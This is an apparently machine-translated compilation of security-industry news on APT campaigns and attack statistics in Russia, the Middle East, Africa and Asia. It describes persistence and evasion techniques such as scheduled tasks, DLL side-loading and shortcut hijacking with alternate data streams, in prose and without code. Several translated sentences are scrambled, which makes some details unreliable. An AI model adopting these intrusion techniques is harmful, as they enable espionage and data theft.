The vast majority of the APT groups considered operating in the Middle East have attacked government agencies (94%) and industry (81%) at least once, and 69% have attacked the fuel and energy complex, said Yana Avezova, senior analyst at Positive Technologies research group. - It is worth noting that government agencies are the most attractive targets for all attackers: they accounted for 22% of the total number of attacks on organizations in the Middle East in 2022-2023.
File:Aquote2.png

As noted in the study, the five most attacked industries also included telecommunications companies and the military-industrial complex: every second group attacked them.

According to Positive Technologies experts, the military-industrial complex was in the top of the attacked industries due to the specifics of the region. The Middle East media, compared to other regions, also often become targets of attacks and historically retain a high place in the ranking. Experts attribute the increased interest of cybercriminals in the telecommunications industry to attacks by groups of Chinese origin, since telecommunications has long been one of their main goals.

According to a Positive Technologies analysis, 69% of groups make phishing emails to gain initial access, 31% use flaws in public applications, and 19% place malware on specialized web resources.

{{quote "Complex targeted attacks begin with intelligence," said Alexander Badaev, specialist in the information security threat research department of the Positive Technologies Security Center (PT Expert Security Center). - Attackers can conduct large-scale network scans in search of suitable targets. As a result, attackers have enough information for the initial stage of penetration. Such information includes, for example, those installed on the target server software and its versions subject to known knowledge. to vulnerabilities Reconnaissance is followed by the stage of preparing an instrumental base for attacks. Attackers can register fake domains and create accounts email or accounts in to social networks conduct targeted phishing. }}

According to the expert, after receiving the initial access, the attackers seek to gain a foothold in the infrastructure. 69% of APT groups use Task Scheduler (an operating system component that allows programs or scripts to run when a certain condition is met), as is the case with the campaign against the UAE government, when the OilRig group created a planned Microsoft Edge Update Service task that was triggered every five minutes and launched malware. Most of the attackers (56%) configured malware startup. A third of APT groups (31%) configured malicious code to be triggered when a certain event occurred to fix victims in the system.

After penetrating the corporate network, attackers study the devices that they managed to access in order to understand how to proceed. As the analysis of Positive Technologies showed, the attackers are primarily interested in data on the operating system and architecture of the compromised node, as well as information on software versions, installed patches and service packs - 94% of groups use this technique. A large number of groups (81%) try to identify users of a compromised node and determine their degree of activity, 63% of attackers study processes running on compromised nodes, 56% analyze files and directories in search of useful information.

As experts from the PT Expert Security Center noted, it is important for APT groups to remain unnoticed in a compromised environment for as long as possible. They resort to various methods of concealing traces of presence. Typically, attackers pre-test samples of their malware and subsequently modify them to bypass detection by antivirus solutions. A common way is to disguise malware as legitimate files or applications. Most (56%) APT groups remove signs of their activity: clean event logs and network connection history, change time stamps. These actions subsequently make it much harder for cybersecurity professionals to investigate incidents.

To combat complex targeted attacks and build an effective protection system against them, Positive Technologies experts recommend that organizations pay attention to the basics of effective cybersecurity, which includes:

  • Asset management.
  • Incident monitoring and response.
  • Cybersecurity training.
  • Security assessment.

Foreign hacker group spied on the Russian department

Experts from the Solar Cyber ​ ​ Threat Research Center 4RAYS Solar Group found foreign hackers in the infrastructure of one of the executive authorities. Attackers used complex camouflaged self-written software for espionage, and for its remote control - compromised servers of organizations in different countries. About this "Solar" reported on March 6, 2024.

The grouping has existed for at least three years, but there is not enough data for its exact attribution, so the cluster of this activity is temporarily named NGC2180. By the beginning of March 2024, all detected malware was neutralized, the affected systems returned to work.

At the end of 2023, Solar 4RAYS specialists conducted a comprehensive analysis of the infrastructure of one of the Russian departments operating with critical data. During the work, signs of hacking were found on one of the computers. A deeper study found in the departmental network several samples of multi-stage harmful software (HVE), called DFKRAT experts. At the final stage of the attack, the malware is deployed by an implant that provides the attacker with the possibility of manipulation in the attacked system (from stealing user data to downloading an additional HVE).

The discovered version of the malware has not been found anywhere before. But in the public space it was possible to find its previous options and trace their evolution, starting in 2021. With each new version, the HVE became more complex. In particular, in the last instance, attackers used the Side-Loading DLL technique (placing malicious code in a folder with a legitimate program) and refused to gradually transfer commands from the management server to the target system. Such actions of HPE developers indicate attempts to hide malicious activity from the means of protection on the target host.

One of the samples found from the previous version of the HPE was delivered to the victim's computer using a phishing email stuffed with a bootloader. In the last attack, the vector of infection remained unknown.

File:Aquote1.png
We were able to find and analyze a fragment of the control server code. The file was uploaded to one public service under the name config.jsp from the IP address of Saudi Arabia. Analysis of the network infrastructure showed that it was probably an intermediate victim, whose server was compromised to host the control center (C2) on it. The current version of the implant used a hacked server component of the Institute of Nanoscience and Nanotechnology of the Democritus National Center for Scientific Research in Greece to coordinate its work, "said Alexei Firsh, head of the threat analysis department of the Solar 4RAYS Solar Group of Companies.
File:Aquote2.png

The activity of the NGC2180 for at least the last three years indicates a high organization of the cyber group. And the compromise of legitimate servers for the deployment of S2 infrastructure, as well as the focus of NGC2180 on significant government structures, indicate a systematic approach and possible political motivation of the group.

File:Aquote1.png
Based on the analysis of the control server fragment, we believe that in the wild there are even more samples belonging to the described cluster. The HPE architecture was qualitatively processed by hackers from attack to attack: the methods of remote control, delivery and deployment were improved - only the core of the implant itself remained unchanged. All this suggests that behind these attacks is a well-organized group with a large supply of resources, which, as we know from other public studies, are often allocated with the support of the state. In the future, we expect more attacks from NGC2180, so we urge the information security community to use the indicators given in our study to identify traces of the presence of this group, "warned Dmitry Marichev, an expert of the HPE analysis group at the Solar 4RAYS Solar Research Center.
File:Aquote2.png

Cyber ​ ​ group sends very convincing phishing letters to Russian industrial companies allegedly from government agencies

BI.Zone, a Russian digital risk management company, on January 30, 2024 announced a relatively new cyber campaign aimed at Russian enterprises. The group behind it, Scaly Wolf, is hunting for corporate data. Most of the targets of attacks are industrial and logistics companies from Russia. The last such attack was noted in January 2024.

While attackers use a more or less standard method of initial attack - phishing, there are two circumstances that significantly distinguish the activities of this group from others. Firstly, the letters are disguised as documents of state bodies: requests and requirements of Roskomnadzor, the Investigative Committee of the Russian Federation and the Military Prosecutor's Office of the Russian Federation, as well as court decisions and other orders of regulators.

Secondly, phishing emails are distinguished by a very high level of execution.

File:Aquote1.png
"The hallmark of Scaly Wolf is the high level of legal literacy with which letters and forged documents were drawn up. In all cases, the text of the letter looks extremely convincing and inspires trust among users. This encourages the victim to follow the instructions from the letter and open an encrypted archive where the documents are allegedly contained. In fact, there is malware - the White Snake styler, which allows attackers to access several corporate resources at once, such as e-mail and the CRM system, "[3]the BI.Zone publication says.
File:Aquote2.png

White Snake is an infostiler popular in the cybercriminal environment, that is, data theft software.

It is characteristic that this malware spreads under cybercriminal typical conditions for the Russian language: not to be used against targets RUSSIAN FEDERATION in and. countries CIS To do this, a technical measure has been implemented - a function that immediately stops the program if it is launched on a device with an IP address from the "prohibited," as the authors of the publication put it, regions.

However, the Scaly Wolf operators simply disabled this function, leaving everything else in place. In other words, they use the "pirated" version of White Snake and with considerable success.

File:Aquote1.png
The fact that the Russian-speaking group attacks targets within the Russian Federation indicates that there are no rules and etiquette for them, "says Alexei Vodyasov, technical director of SEQ. - However, there is nothing new in the fact that some representatives of cyber crime deceive others: it was and will always be because it is primarily crime, and only in the second - "cyber."
File:Aquote2.png

BI.Zone believes that Scaly Wolf will continue to carry out attacks on Russian organizations for a long time. Grouping methods retain effectiveness, and nothing suggests that this may somehow change.

2023

Hackers attacked a machine-building company with letters on behalf of the Investigative Committee of the Russian Federation

In October 2023, the Russian enterprise of the engineering sector contacted Doctor Web with suspicion of the presence of HPEs on one of its computers. Experts investigated this incident and found that the affected company faced a targeted attack. Representatives of Dr.Web reported this to TAdviser on March 11, 2024.

During the attack, attackers sent e-mail phishing messages with attached malware responsible for initially infecting the system and installing other malicious tools into it.

As Dr.Web experts found out, the purpose of this attack was to collect sensitive information about employees, to obtain data information about to infrastructure the company and its internal network. In addition, the fact of uploading data from an infected computer was recorded ― both in the form of stored on and in the computer files form of screen shots created during the work of the HVE.

In early October 2023, the attackers sent several phishing emails to the email address of the affected company with the topic of "investigation" of certain criminal cases of evasion of payment. taxes The letters were sent allegedly on behalf of the investigator Investigative Committee of the Russian Federation and contained two attachments. The first was a secure password zip archive. He hid a malicious program in himself, when it was launched, the infection of the system began. The second was a pdf document that was not malicious. It contained phishing text that all information about the "criminal case" was in the archive, and prompted the discovery of malware from it.

The very first phishing email contained the archive "Requirement 19098 Trace to the Russian Federation from the 02.10.23 PASSWORD - 123123123.zip." In turn, the Trojan program located in it was hidden in the file "List of legal entities and enterprises, tax evasion, claims and additional.exe."

One of the last messages sent was the following:

Attached to it was a phishing pdf-document "Investigator's requirement, tax evasion (request within the framework of the DD).pdf" and a zip archive "Requirement 19221 of the RF IC from the PASSWORD 11.10.2023 - 123123123.zip" with the following content:

As in earlier messages, the attackers specified the password for extracting files from the archive in both its name and in the name of the document "Password for opening.odt 123123123." This document itself, as well as the files "Rights and Obligations and Procedure of Art. 164, 170, 183 Code of Criminal Procedure RF.pdf" and "SC RF.PNG," were not malicious. This archive contained two copies of the malicious program: "List of enterprises, tax evasion, as well as additional materials.exe" and "Additional materials, list of questions, invoices and primary documents.exe."

According to Dr.Web, in all cases, a malicious application spread by cybercriminals was Trojan.Siggen21.39882. This malware, known as WhiteSnake Stealer, is sold in the shadow segment Internet () Darknet and is used to steal accounts from various software, as well as other data. In addition, it can download and install other malicious applications on attacked computers. In the target attack under consideration, she was assigned the role of the first stage of infection. Having received the appropriate commands, the malware collected and transmitted to the attackers information about the configuration of the profiles - Wi-Fi networks of the infected system, as well as passwords for access to them. Then she launched - SSH proxy server and installed the second stage in the system.

The second stage and at the same time the main tool of attackers, as Dr.Web experts found out JS.BackDoor.60 was the backdoor malware ― through which the main interaction between attackers and an infected computer passed. One of the features of the backdoor is that it uses its own framework in JavaScript. The Trojan consists of the main obfuscated body, as well as auxiliary modules, which, thanks to the specifics of the malware architecture, are both part of it and the tasks that it performs through JavaScript functions common to them. New tasks arrive at the Trojan from the control server and actually turn it into a multi-component threat with expandable functionality, which allows it to be used as a powerful cyber espionage tool.

The mechanism by which the JS.BackDoor.60 provided the possibility of its autorun is also interesting. Along with one of the traditional ways ― make the necessary changes to the Windows registry ― the Trojan specifically modified shortcut files (.lnk). To do this, he checked the contents of a number of system directories, including the desktop and taskbar directory, and assigned wscript.exe as the target application for launching to all shortcuts found in them, except Explorer.lnk or Explorer. At the same time, special arguments were specified to run it, one of which was an alternative data stream (ADS), into which the backdoor body was written. As a result of the changes, the modified shortcuts first launched JS.BackDoor.60, and after ― the source programs.

Throughout the attack, attackers actively directed various commands to the backdoor and with its help stole the contents of dozens of directories from the infected computer, which contained both personal and corporate data. In addition, the "Dr.Web" recorded the fact that the Trojan created screenshots (screenshots).

An additional surveillance tool in the attack in question was the BackDoor.SpyBotNET.79 malware, which was used to audio listen and record conversations through a microphone connected to an infected computer. This Trojan recorded audio only if it recorded a certain intensity of sound ― in particular, characteristic of voice.

At the same time, the attackers also tried to infect the system with a Trojan.DownLoader46.24755 bootloader Trojan, but due to an error they were unable to do this.

The chronology of the attack is presented in the following diagram:

The chronology of receiving tasks by the JS.BackDoor.60 Trojan:

In general, the analysis did not show an unambiguous involvement in this attack of any of the previously known APT groups, concluded the experts of "Dr.Web."

According to them, the use of malicious tools that are available as a commercial service (MaaS ― Malware as a Service), such as Trojan.Siggen21.39882, allows even relatively inexperienced attackers to carry out very sensitive attacks on both business and government agencies. In turn, social engineering still poses a serious threat.

File:Aquote1.png
This is a relatively simple but effective way to bypass the built protection that both experienced and novice cybercriminals can use. In this regard, it is especially important to protect the entire infrastructure of enterprises, including workstations and email gateways. In addition, it is recommended to periodically instruct employees on the topic of information security and acquaint them with current digital threats. All these measures will help reduce the likelihood of cyber incidents, as well as minimize damage from attacks, ― added to Dr.Web.
File:Aquote2.png

Cyber ​ ​ espionage group attacks Russian companies, hiding behind the topic of support for participants in the SVO

F.A.C.C.T. recorded attacks by the Cloud Atlas spy group on a Russian agricultural industry and a research state-owned company. Both mailings were intercepted by F.A.C.C.T. Managed XDR's defense against complex and unknown cyber threats. The company announced this on December 19, 2023.

According to the F.A.C.C.T., Cloud Atlas is a pro-state APT group specializing in cyber espionage and theft of confidential information. Active since at least 2014, according to researchers. More often than others, the goals of Cloud Atlas were industrial enterprises and state-owned companies in Russia, Belarus, Azerbaijan, Turkey and Slovenia[4].

Cloud Atlas prefers point mailing with a malicious attachment as the main attack vector. As part of the campaign, the attackers used addresses registered through mail services antonowadebora@yandex.ru and mil.dip@mail.ru and two current topics - support for participants in the SVO and military registration.

Image:Скриншот письма с вложением для профсоюзных лидеров.png
Screenshot of a letter with an attachment for union leaders asking them to support the participants of the SAO and their families

In the first letter, the attackers, on behalf of representatives of the Moscow City Organization of the All-Russian Professional Union of Employees of State Institutions, propose to organize the collection of postcards and congratulations to the participants of the SVO and their families. The contacts indicated in the letter are real - they can be found in the public domain.

Screenshot of a letter with changes in legislation on the introduction of military registration and booking of citizens in stock

In another mailing list, the attackers are presented by the "Association of Training Centers" and use the current topic of changes in the legislation on the introduction of military registration and booking of citizens in stock.

When the user opens the document from the 20.11.2023 from the email attachment, the link of the deleted template is downloaded. The referenced template is an RTF file containing an exploit of the CVE-2017-11882 vulnerability.

Cyber threat trends presented

The top 10 most attacked industries in 2023, a surge cyber attacks from the outside the Asian hackers and an increase in the number of incidents with devastating consequences for organizations RUSSIAN FEDERATION on November 14, 2023 was provided by the GC "" and Solar shared its forecasts for 2024.

The most serious cyber threat for Russian organizations is posed by professional APT groups (Advanced persistent threat, a constant threat of increased complexity). According to an analyst at the Solar 4RAYS Cyber ​ ​ Threat Research Center, in 2022-2023. the share of APT attacks amounted to 20% of all incidents under investigation. The danger of them is that it is almost impossible to determine the points of penetration of hackers into the company's infrastructure without specialized expertise: attackers either cover their tracks too well or have been in the infrastructure for so long that it is not possible to find them. The main goal of groups of this type is cyber espionage and data theft, and their main victims are the telecom industry and the public sector.

According to telemetry "," Rostelecom among the advanced groups, the most active in the territory RUSSIAN FEDERATION were hackers from the Asian region. First of all, these are the Chinese groupings. So, in September 2023, they launched another campaign with the aim of cyber espionage - malware from 20 to 40 systems the Russian of organizations were infected every day - and only a month later the attackers were noticed by vendors of protective equipment, after which there was a decline in their activity.

Image:Image002 (1).jpg

The North Korean group Lazarus is also very active on the territory of the Russian Federation. Over the past 2 years, Solar 4RAYS experts have investigated several related incidents. Among the victims were, in particular, state authorities. At the same time, an analysis of these sensors showed that at the beginning of November, Lazarus hackers still have access to a number of Russian systems.

File:Image004Solar 4RAYS.jpg

Identifying groups directly behind a flurry of attacks the Ukrainian is quite difficult, since a huge number of politically motivated attackers from different regions act in their interests, experts say. Nevertheless, in some cases, on indirect grounds to identify , it was possible to Ukrainian. hackers For example, they conducted malicious mailings using the open framework Pupy RAT they added, and recently they managed to attack one of the telecom operators, which led to the destruction of part of its infrastructure.

{{quote "Thanks to telemetry from the Rostelecom network, as well as from the services of the Solar JSOC Cyber ​ ​ Attack Countermeasures Center and the Solar MSS platform, we timely not only detect existing hacks, but also receive information about upcoming incidents and investigate the activities of hackers of various levels, including APT groups, on a country-wide scale. We predict that in 2024, advanced groups will maintain the volume of their campaigns, and the trend towards hacking contractors will take a leading place, - said Igor Zalevsky, head of the Solar Cyber ​ ​ Threat Research Center 4RAYS Solar Group of Companies. }}

During SOC-Forum 2023, experts from the Solar Group named TOP-10 the industries most affected by hackers for 2022-2023. Most of the cyber attacks were carried out by state organizations (44%) and telecom (14%), as well as agriculture (9%) - the latter can be explained by the proximity of the industry to the state. The rating also includes industry (7%), the financial sector (7%), and with equal shares of 4% retail, services, education, NGOs and power.

Image:топ-10 пострадавших отраслей.jpg

Most of the incidents under investigation involve cyber fraudsters (42.5%) - they usually make money from hacks by encrypting, stealing and reselling data. The second place is taken by cyberhuligans (30%), who are trying to attract attention through a minimal impact on the IT infrastructure, for example, DDoS attacks and deface sites. In third place are professional APT groups (20%).

Image:уровни хакеров в расследованиях.jpg

In 2022, due to the political situation, cyberhuligans intensified, but in 2023 the number of incidents that required the involvement of investigation experts decreased by 3 times. The fact is that numerous mass attacks taught companies and the information security industry to respond better to them, and the attackers themselves switched to more serious goals.

At the same time, the number of attacks organized by cyber fraudsters continues to grow and in 2023 increased by 30% compared to 2022. With the onset of 2023, hackers of this type almost ceased to be interested in monetization, and instead of selling data on the dark web, they began to publish it for free or irrevocably encrypt it in order to cause more damage to the affected party.

File:Aquote1.png
The goals of yesterday's hacktivists have changed: instead of DDoS and deface, fraudsters are trying to hack and commit destructive actions against the infrastructure of organizations, including facilities. critical information infrastructure (CII) We believe that in 2024 the number of incidents with destructive consequences will increase, and with growth import substitution hackers they will begin to be used Russian software to penetrate through vulnerabilities software, "commented Vladislav Lashkin, head of the cyber threats department at the Solar 4RAYS Research Center, Solar Group of Companies.
File:Aquote2.png

68% of attacks in Africa are targeted

Positive Technologies analyzed relevant cyber threats on the the African continent in 2022-2023. and on July 27, 2023 presented a study. According to to data experts, the most attacked in the region is financial industry (it accounts for almost every fifth attack - 18% of all successful attacks), and the main motivations cybercriminals are direct financial benefit and theft of confidential. At the information same time, in addition to hacktivists, organized hacker groups operate in the region, aimed at cyber espionage in addition to financial benefits. Most of the attacks in the studied period were targeted.

Telecommunications ranks second among the most attacked industries (13% of all successful attacks). The five most attacked sectors of the economy also included government agencies (12%), trade (12%) and industrial (10%) organizations.

File:Aquote1.png
The five "leaders" of Africa's most attacked industries look atypical compared to global statistics. Telecommunications and trade were in the top 5 targets of the attackers, with telecom in second place. A significant increase in customers of telecommunications companies across the continent allows attackers to influence both individual companies and entire regions, said Positive Technologies analyst Ekaterina Semykina. - Criminals attack organizations to disrupt the company and demand ransom for system recovery, as well as to steal user data. Companies need to take steps to prevent exploitation of vulnerabilities and the implementation of unacceptable events. We recommend paying attention to the process of managing vulnerabilities in the organization.
File:Aquote2.png

According to a Positive Technologies study, 68% of successful attacks had a targeted nature: in them, attackers were aimed at a specific organization, private person or industry. In attacks on organizations, attackers most often attack computers, servers and network equipment (85%).

Web resources became the targets of attackers in 15% of attacks: as a rule, in these cases, most often attackers managed to successfully carry out DDoS attacks. African government and financial institutions are regularly subjected to DDoS attacks by hacktivists. These attacks can have serious consequences for the functioning of important infrastructure systems and services.

Most often, attackers' attacks were aimed at obtaining confidential information: 38% of companies faced this. Also, as a result of the actions of criminals, there were interruptions in the work of organizations: for example, in every third successful attack (35%), the main activities of companies were violated. Direct financial losses resulted in 7% of incidents.

A serious threat to the region is ransomware, which was used in every third attack on organizations using HPE. Most often, attackers manage to compromise computers, servers and network equipment, which indicates a low level of protection for companies and the presence of vulnerabilities on the network perimeter.

As reported in the study, shadow forums are an active space for trade access to networks of large companies in Africa, including government and financial institutions, trading and IT companies. According to open sources, criminals are ready to pay about 300 for access with domain administrator privileges, and dollars USA 170 dollars US for access with local administrator privileges. In addition, attackers share and offer databases of employees and customers of various companies for sale.

Positive Technologies noted that in order to successfully combat cyber threats in the region, it is necessary to actively develop and implement measures aimed at strengthening cybersecurity. Amid the rapid digital transformation in African countries, there is an urgent need to change the approach to information security. With the increasing availability of the Internet, we can also expect an increase in the activity of international organized cybercriminal networks in the region, and the more digitalized countries of the continent are an attractive target for attackers. At the same time, there are no proper measures to implement cybersecurity in the region, the legislative framework in this area is not well worked out, and the population is extremely poorly aware of the problems associated with information security. All these factors lead to an increase in cyber attacks and significant damage to the countries of the region.

File:Aquote1.png
To ensure the cyber stability of organizations in African countries, including public and private companies, it is critical to identify unacceptable events and protect critical assets, "said Alexey Novikov, director of the Positive Technologies security expert center. - It is also recommended to equip yourself with protective equipment and implement measures to monitor and respond to cyber threats. Employee training and investment in the development of information security professionals will also play a key role in improving the cybersecurity of organizations in the African region.
File:Aquote2.png

A surge in targeted cyber attacks on the state IT systems of many Arab states was recorded

Positive Technologies experts have recorded a surge in targeted cyber attacks on the state IT systems of many Arab states. The press service of the Russian information security company announced this on July 19, 2023.

According to the study, government agencies in the Middle East are especially attractive targets for cybercriminals: they account for 22% of the total number of attacks on organizations, with 56% of cases being attacks by APT groups. Attackers, using a wide arsenal of malware and exploits, penetrate the victim's IT infrastructure and remain inside for a long time for the purpose of cyber espionage.

Industrial sector enterprises are also at risk (16% of incidents) because they have valuable information, are critical infrastructure facilities and significantly affect the region's economy. Attackers often use social engineering to gain access to victims' systems (33%), and malware ON for remote control (62%) and software that destroys data (31%) are the tools most often used in attacks on this sector.

According to analysts, 78% of cyber attacks on organizations in the Middle East are directed at computers, servers and network equipment. Attackers compromise systems by downloading malware or exploiting vulnerabilities to steal confidential information or to disrupt the stable operation of devices.

As noted in Positive Technologies, a feature of cyber attacks in the Middle East was the use of wipers that destroy files on compromised devices. Vipers are extremely dangerous to get on the devices of automated process control systems (APCS), as this can lead to production disruption and accidents.

Experts pay special attention to the increase in the activity of ransomware groups, which have become one of the main threats. The number of incidents with ransomware in the first quarter of 2023 in the world increased by 77% compared to the same period the previous year. The Gulf countries, including, and UAE Saudi Arabia , are Kuwait the most attacked in the Middle East region.

Russian hackers have replaced imports

Experts from the cyber intelligence department BI.ZONE recorded attacks by the Quartz Wolf group on the hotel business. For the first time, a domestic solution for remote access is used against Russian companies. Thus, criminals bypass traditional means of protection and successfully gain a foothold in the business infrastructure. BI.Zone announced this on July 19, 2023.

Attackers often use foreign remote access tools to gain a foothold in the infrastructure of a compromised company. The most popular programs for this are TeamViewer, AnyDesk and AmmyAdmin. They were often used by the companies themselves for various business purposes, so security services could not block such programs. However, now many Russian organizations are switching to domestic software, so it became possible to block foreign software that attackers can use. The Quartz Wolf group has adapted the attacks: to bypass traditional defenses, it uses domestic solutions for remote access. This increases the chances of attackers to remain unnoticed in the infrastructure.

Attackers send phishing emails on behalf of the Federal Hotel Service company, which helps to transfer registration information and data for migration registration to the Ministry of Internal Affairs. In the messages, the attackers allegedly notify of the changes in the registration procedure that have entered into force, which urgently need to be familiarized with the attached link. The user downloads the archive, opens it and, without knowing it, launches a malicious file. In this case, the Russian solution for remote access "ASSISTANT" is installed - software that is used for its own business purposes by various companies.[5]

Remote access allows attackers to intercept control of a compromised system, block input devices, copy files, modify the registry, use the Windows command line, etc. This opens up opportunities for attackers: from stealing credentials for logging into business systems and transferring client data to a third-party server to making transactions in banking software on behalf of the victim.

Шаблон:Quote 'author=said Oleg Skulkin, head of cyber intelligence at BI.ZONE.

Phishing emails remain one of the main methods of gaining initial access during targeted attacks. To protect against them, BI.ZONE experts recommend using specialized solutions that block spam and malicious emails. Continuous IT monitoring services will help you respond effectively to threats. They allow you to quickly recognize advanced attacks and neutralize threats.

Hacker group Space Pirates attacks the public sector, aviation and rocket and space industry in Russia

The hacker group Space Pirates attacks the public sector, the aviation and rocket and space industry in Russia. This was announced on July 17, 2023 by specialists from the Positive Technologies Security Center (PT Expert Security Center, PT ESC). Read more here.

APT group Dark Pink strikes Asian government and military structures

The APT group Dark Pink is delivering cyber strikes on Asian government and military structures. This became known on January 11, 2023.

During attacks, hackers use a set of powerful custom tools and new tactics.

In conducting the investigation, Group-IB stressed that Dark Pink could be a completely new APT group. The gang of hackers got its name because of the names of some electronic boxes to which the stolen data was sent. However, Chinese researchers gave it a different name - Saaiwc Group.

Group-IB analysts uncovered seven cyberattacks, behind which Dark Pink is behind, and after the discovery of the group's GitHub account, they suggested that the attackers entered the cybercriminal arena back in mid-2021.

Most of the attacks targeted the Asia-Pacific region, among the confirmed victims were two military departments in the Philippines and Malaysia, government agencies in Cambodia, Indonesia, Bosnia and Herzegovina, and a religious organization in Vietnam.

During cyber attacks, Dark Pink uses a number of tactics and a set of powerful custom tools: TelePowerBot, KamiKakaBot, Cucky and Ctealer. These modules are used to steal important information that is stored in the networks of government and military organizations.

The group received initial access to networks using phishing emails with a malicious ISO image inside. In one of the discovered letters, hackers posed as an applicant applying for the position of a public relations intern.

The main methods of infection in the group are only two:

  • Side loading of DLL;
  • Makes changes to the value registry that defines the program associated with opening the file. Thus, when a user tries to open the desired document, this leads to the launch of a malicious program sewn into a pre-created copy of this document.

According to experts, Dark Pink not only steals information, but also infects USB devices connected to hacked computers, gains access to instant messengers, and also captures sound from the microphones of hacked devices[6].

Turla Team uses 2013 closed domains to attack victims of old botnet

On January 9, 2023, it became known that Mandiant cybersecurity researchers discovered that the Turla Team group uses the infrastructure of the Andromeda malware a decade ago to distribute its spy tools to targets in Ukraine.

According to analysts, the APT group Turla Team (also known as UNC4210) took control of 3 domains that were part of the now defunct management and control (C&C) infrastructure of the Andromeda (Gamarue) botnet network to reconnect to compromised systems. The ultimate goal was to distribute the KOPILUWAK intelligence utility and the QUIETCANARY (Tunnus) backdoor to Andromeda victims.

Andromeda consisted of 464 separate botnets and infected about 1.1 million computers a month. As part of the law enforcement operation in 2017, about 1.5 thousand domains and IP addresses used in the C&C infrastructure were disabled.

Andromeda continues to spread from infected USB devices, so re-registered domains are still dangerous, and attackers can take control of them to deliver new malware to victims. Most likely, Turla Team will compromise systems and then sell access to them on underground forums.

During the discovered incident, an employee of an unnamed Ukrainian organization inserted an infected USB drive into a working computer in December 2021 and clicked on a malicious LNK file masquerading as a folder on the USB drive. This led to the deployment of Andromeda on the host.

It is noteworthy that if the user inserts a "clean" USB drive into an already infected system, this new USB drive can become infected and continue to distribute Andromeda.

Attackers tried to secretly profile systems to identify the most interesting targets, which then attacked. Mandiant only observed Turla Team server activity for short periods of time, usually a few days, with weeks of downtime[7].

2022

Global darknet access sales rise 40%

The number of access to the infrastructure of industrial organizations in the world, put up for sale on the darknet in 2022, amounted to 122, which is 40% more than a year earlier. Positive Technologies experts released such data at the end of February 2023.

Accesses account for 75% of all ads related to industry, and their cost usually ranges from $500 to $5,000. The industrial sector attracts even low-skilled cybercriminals with easy earnings: they gain initial access and then sell it to more competent attackers to further develop the attack, the study said.

In total, in 2022, 223 incidents were recorded in industrial companies caused by attacks by attackers, which is 7% more compared to 2021. The largest number of incidents occurred in the second quarter of 2022 - then 75 successful attacks were identified. Among the attacks on organizations in the industrial sector, 97% were targeted; APT attacks accounted for 17% of the total number of incidents.

Of the successful attacks, 87% were directed to computers, servers and network equipment - the main targets of ransomware. In 44% of cases, attackers attacked the personnel of industrial organizations using malicious emails (94%) and phishing sites (10%). 12% of attacks were directed to the web resources (sites) of industrial sector organizations.

It also follows from the Positive Technologies report that in most successful attacks (70%) on industrial organizations, attackers used malware. Almost half of the cyberattacks (44%) on the industry used social engineering methods. The share of attacks in which software vulnerabilities were exploited was 43%.

The trend of cyber attacks in 2022 was the use of wipers (software that removes data on the device) in attacks on the industrial sector. The use of this HPE led to violations of technological processes and equipment failure.[8]

Log4Shell remains a formidable weapon in the hands of Iranian cybercriminals

  • the group The Iranian APT gained access to the server to the federal agency USA using the infamous Log4Shell. This became known on November 17, 2022. Experts suggest the operation began hacker in February 2022, after which it was revealed two CISA months later.

According to a joint report published by CISA and FBI, the hackers took advantage of the Log4Shell to penetrate the vulnerable server, VMware Horizon after which they deployed cryptominer XMRig on it. Then the attackers moved to the controller, domain compromised the credentials data and implemented the Ngrok service on several hosts in order to gain a foothold in the system.

Ngrok is a service that allows you to open access to the internal resources of the machine on which it is running from an external network by creating a public address, all requests for which will be transferred to the local address and the specified port.

Law enforcement agencies did not say which federal organization was the victim of hackers, saying only that it is one of the agencies (Federal Civilian Executive Branch Agencies, FCEB).

In addition, the CISA report FBI called on all organizations with potentially vulnerable systems VMware to immediately apply all available updates or workarounds, think about possible compromise and scan systems for malicious ON and traces of hacking[9]

The number of cyber attacks on automated control systems in Russia soared by 80%

On September 20, 2022, Kaspersky Lab experts published a study in which they reported an increase in the number of targeted cyber attacks on industrial enterprises in Russia. Most often, malicious objects penetrate computers of automated control systems (ACS) from the Internet.

In January-June 2022, attacks on automation systems using malicious documents increased by 80%, and the share of computers of such systems on which ransomware was blocked increased by 10%, reaching a maximum since 2020.

The number of cyber attacks on automated control systems in Russia soared by 80%

According to the report, both building automation systems and information systems of organizations located in these buildings were subjected to cyber attacks in the first half of 2022. Also, compared to 2021, the share of attacked APCS computers in the oil and gas industry increased.

According to the head of Kaspersky the Industrial Systems Emergency Response Team (ICS SERT) Evgeny Goncharov, not all automated control systems are really isolated from the Internet, this is the main reason why malware ON often penetrates technological networks.

{{quote 'Corporate mail on computers on a technology network paves the way for spyware ON distributed through phishing emails, often from one industrial enterprise to another in letters disguised as correspondence from victim organizations... It is important to use comprehensive specialized security solutions of the new generation, which, among other things, will provide IT protection - and the OT segment within the framework of a single INFORMATION SECURITY system, - he explained. }} Many attacks on industry begin with attempts to penetrate corporate network devices. Therefore, enterprises need to strengthen the cybersecurity of the technology segment, covering every element of infrastructure, experts added.[10]

APT group behind SolarWinds attack uses MagicWeb malware to post-compromise Active Directory

The attackers responsible for the attack on the SolarWinds supply chain began to use MagicWeb malware for post-compromise, which is used to maintain constant access to the compromised environment and perform lateral movement. This became known on August 25, 2022. Researchers from Microsoft discovered how the Nobelium APT group uses the backdoor after obtaining administrator rights on the Federated Services (AD FS) Active Directory server. Read more here.

North Korean APT group attacks South Korean political and diplomatic organizations

North Korean APT group Kimsuky is campaigning against South Korean political and diplomatic organizations, as well as South Korean university professors, think tank researchers and government officials, according to a Kaspersky Lab report. This became known on August 25, 2022.

Illustration: itkvariat.com

Kaspersky Lab previously named the group's backdoor GoldDragon, and the infection chains led to deployment malware for those Windows designed to collect, files tap keys thefts and log in to data the web.browser

In the discovered campaign, Kimsuky uses phishing messages containing a Word document with macros that supposedly contain content related to geopolitical issues in the region.

The group uses the features of HTML-Application (HTA) and Compiled HTML Help (CHM) files as bait to compromise the system.

Regardless of the method used, after initial access, Visual Basic Script is implemented from a remote server, designed to take the digital fingerprint of the victim's machine and extract additional useful data, including an executable file for extracting confidential information.

As noted, the campaign also contains a previously unused attack method. If the recipient clicks the link in the email to download additional documents, their email address is sent to the Management and Control (C&C) server. If the request does not contain the expected email address, then the victim opens a legitimate uninfected document for download.

To further complicate the chain of infections, the first C&C server redirects the victim's IP address to another VBS server, which then compares it to an incoming request that is generated after the victim opens the decoy document. "Victim verification" on two C&C servers ensures that VBScript is delivered only after successful verification of the IP address, which indicates a narrowly targeted attack.

According to Kaspersky Lab, the Kimsuky group is constantly developing its malware infection schemes ON and implementing updated methods to make analysis difficult. The main difficulty in tracking this group is that it is difficult to determine the full chain of infection[11]

